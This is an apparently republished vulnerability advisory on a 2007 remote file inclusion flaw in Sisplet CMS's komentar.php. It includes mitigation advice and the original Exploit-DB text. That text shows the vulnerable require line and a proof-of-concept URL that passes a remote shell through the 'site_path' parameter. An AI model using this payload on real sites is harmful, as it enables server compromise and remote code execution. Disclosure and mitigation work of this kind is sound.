Sisplet CMS

vendor:

Sisplet CMS

by:

kezzap66345

5.5

CVSS

MEDIUM

RFI (Remote File Inclusion)

CWE

Product Name: Sisplet CMS

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The Sisplet CMS is vulnerable to Remote File Inclusion (RFI) attack in the komentar.php file. An attacker can exploit this vulnerability by injecting a malicious URL in the 'site_path' parameter, leading to the inclusion of arbitrary remote files.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in file inclusion functions. Additionally, the use of a web application firewall can help in preventing such attacks.

Source

Exploit-DB raw data:

Sisplet CMS
*****************
Found by kezzap66345 *
*****************
*****************
Script Download:http://www.sisplet.org/uploadi/editor/Sisplet0504.tar.bz2
		        https://sourceforge.net/project/showfiles.php?group_id=111881

*****************
*****************
ERROR#1:
File:main/forum/komentar.php
*****************


require($site_path.'main/forum/class.php');     <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/main/forum/komentar.php?site_path=[SHELL]


**************************************************************************************
**************************************************************************************
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************

# milw0rm.com [2007-04-05]